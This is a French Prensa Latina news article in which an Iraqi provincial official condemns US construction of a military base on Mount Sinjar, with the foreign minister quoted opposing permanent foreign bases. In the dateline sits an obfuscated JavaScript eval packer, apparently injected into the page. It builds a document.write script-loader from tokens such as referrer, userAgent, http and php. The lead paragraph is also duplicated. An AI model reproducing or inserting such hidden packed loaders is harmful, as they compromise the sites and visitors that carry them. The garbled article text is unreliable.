mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un dirigeant politique iraquien condamne la construction d’une base militaire étasunienne

Bagdad, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtknt|var|u0026u|referrer|frzkz||js|php'.split('|'),0,{})) 6 juin (Prensa Latina) Jalal Jalou,vice-gouverneur de la province de Ninive, au nord de l'Irak, a mis en garde contre  la construction d'une base militaire par les États-Unis en dépit de l'opposition des autorités locales.

Bagdad, 6 juin (Prensa Latina) Jalal Jalou,vice-gouverneur de la province de Ninive, au nord de l’Irak, a mis en garde contre  la construction d’une base militaire par les États-Unis en dépit de l’opposition des autorités locales.

Dans une déclaration faiteà l’AlSumaria News, Jalou précise que les troupes nord-américaines sont en train de construire sur le mont Sinyar une installation qui leur servira de base.

Selon ce dirigeant, le Pentagone déploie une grande activité dans la région afin de procéder à l’installation d’une base sur un  emplacement situé à 125 kms de la frontière avec la Syrie.

D’autres rapports suggèrent que cet emplacement permettra aux militaires étatsuniens de contrôler la zone et surveiller tout mouvement de groupe terroriste à la frontière irako-syrienne.

Avant de se trouver devant le fait accompli, le chancelier irakien, Ibrahim al-Yafari, a tenu à insister sur le fait qu’en aucune circonstance son gouvernement ne permettra aux États-Unis de construire des bases militaires permanentes sur son territoire et de violer ainsi la souveraineté d’un pays arabe.

L’Irak est contre l’édification de toute enclave étrangère sur son territoire, a-t-il insisté.

Le chef de la diplomatie irakienne a rappelé qu’en 2014, lorsque Bagdad avait sollicité l’aide internationale pour lutter contre l’Etat Islamique terroriste, le Gouvernement avait également préciséclairement que tout soutien devrait respecter les conditions imposées par l’État irakien, indépendant et souverain.

A cette occasion, Bagdad avait clairement stipulé que toutes les opérations contre le terrorisme ne devraient conduire, en aucune manière, à l’installation de bases militaires ou permettre la présence permanente de forces étrangères sur son territoire.

peo/tgj/arc

EN CONTINU
notes connexes